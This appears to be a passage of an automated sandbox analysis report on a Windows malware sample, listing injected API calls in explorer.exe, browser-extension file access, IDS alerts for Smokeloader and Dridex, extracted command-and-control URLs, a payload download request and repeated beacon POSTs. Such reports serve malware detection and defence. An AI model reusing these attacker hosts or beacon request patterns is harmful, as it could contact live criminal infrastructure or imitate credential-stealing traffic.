Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F123B lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,12_2_030F123B
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F1198 CryptBinaryToStringA,CryptBinaryToStringA,12_2_030F1198
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F11E1 lstrcmpiW,lstrlenW,CryptStringToBinaryW,CryptStringToBinaryW,CryptStringToBinaryW,12_2_030F11E1
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F1FCE CryptUnprotectData,RtlMoveMemory,12_2_030F1FCE
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0058245E lstrlen,CryptBinaryToStringA,CryptBinaryToStringA,14_2_0058245E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_00582404 lstrlen,CryptStringToBinaryA,CryptStringToBinaryA,CryptStringToBinaryA,14_2_00582404
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_0058263E CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,14_2_0058263E
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02F225A4 CryptBinaryToStringA,CryptBinaryToStringA,19_2_02F225A4
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_02F22799 CryptAcquireContextA,CryptCreateHash,lstrlen,CryptHashData,CryptGetHashParam,wsprintfA,CryptDestroyHash,CryptReleaseContext,19_2_02F22799
Source: bCnarg2O62.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\bCnarg2O62.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.4:49760 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49882 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49890 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49898 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49902 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49913 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49919 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49925 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49941 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49948 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49954 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49960 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49966 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49972 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49978 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49984 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:49994 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50001 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50007 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50013 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50050 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50063 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50065 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 23.145.40.168:443 -> 192.168.2.4:50067 version: TLS 1.2
Source: C:\Users\user\AppData\Local\Temp\9245.exe | Code function: 10_2_00007FF7327AFB38 GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,10_2_00007FF7327AFB38
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,12_2_030F2B15
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,12_2_030F3ED9
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 12_2_030F1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,12_2_030F1D4A
Source: C:\Windows\explorer.exe | Code function: 13_2_003C30A8 FindFirstFileW,FindNextFileW,FindClose,13_2_003C30A8
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\
Source: C:\Windows\SysWOW64\explorer.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\

      Networking

      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49765 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49743 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49746 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49754 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49742 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49756 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49744 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49749 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49774 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49750 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49764 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49759 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49745 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49767 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49751 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49737 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49736 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49748 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49739 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49753 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49755 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49752 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49757 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49763 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49747 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49762 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49786 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49740 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49761 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49758 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49741 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49773 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49738 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50058 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50061 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50060 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50066 -> 211.171.233.129:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50062 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50059 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50064 -> 211.171.233.129:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50068 -> 211.171.233.129:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50057 -> 109.175.29.39:80
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49882 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49882 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49890 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49902 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49890 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49902 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49898 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49919 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49925 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49898 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49925 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49931 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49948 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49941 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49948 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49931 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49919 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49941 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49966 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49978 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49978 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49966 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50007 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50007 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49913 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49913 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50013 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50001 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50013 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50001 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49972 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49972 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50050 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50063 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50063 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50065 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49994 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49954 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50065 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49994 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49954 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49960 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49960 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:49984 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:49984 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2039103 - Severity 1 - ET MALWARE Suspected Smokeloader Activity (POST) : 192.168.2.4:50067 -> 23.145.40.168:443
      Source: Network traffic | Suricata IDS: 2809882 - Severity 1 - ETPRO MALWARE Dridex Post Checkin Activity 3 : 192.168.2.4:50067 -> 23.145.40.168:443
      Source: Malware configuration extractor | URLs: https://ninjahallnews.com/search.php
      Source: Malware configuration extractor | URLs: https://fallhandbat.com/search.php
      Source: Joe Sandbox View | IP Address: 211.171.233.129
      Source: Joe Sandbox View | IP Address: 109.175.29.39
      Source: Joe Sandbox View | ASN Name: SURFAIRWIRELESS-IN-01US
      Source: Joe Sandbox View | ASN Name: LGDACOMLGDACOMCorporationKR
      Source: Joe Sandbox View | ASN Name: BIHNETBIHNETAutonomusSystemBA
      Source: Joe Sandbox View | JA3 fingerprint: 72a589da586844d7f0818ce684948eea
      Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
      Source: Network traffic | Suricata IDS: 2829848 - Severity 2 - ETPRO MALWARE SmokeLoader encrypted module (3) : 23.145.40.168:443 -> 192.168.2.4:49882
      Source: global traffic | HTTP traffic detected: GET /ksa9104.exe HTTP/1.1 | Connection: Keep-Alive | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Host: 23.145.40.164
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://pdafocuyeqbl.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 180 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://qwngamstehwl.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 221 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://wuojfsenfaf.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 131 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://mxlgirixfokriwnb.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 253 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://uefyjrrvgteesaeq.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 332 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://nnyeswfjrdkwqexg.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 311 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://opoqwbbwkupiok.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 273 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://lrhrxwfbfqiw.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 321 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://mjscupccgtmnwxhe.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 369 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://mygtgmevqgkpxy.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 150 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://jqllhnybwxcxea.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 366 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://pupdhamncbgqgk.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 306 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://lhkhfhdvkorst.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 327 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://vhdgrtytskult.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 243 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://ujxngjrjlobur.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 240 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://igxvqkyyvgmutmd.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 289 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://pkuvdwenklvosy.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 154 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://mmqmkrfdtvmaos.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 248 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://klmaxatwhce.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 268 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://kouspbvvekjqvnkd.net/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 239 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://ninjahallnews.com/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 4431 | Host: ninjahallnews.com
      Source: global traffic | HTTP traffic detected: POST /search.php HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | Accept: */* | Referer: https://giugthslvfwuci.org/ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko | Content-Length: 109 | Host: ninjahallnews.com
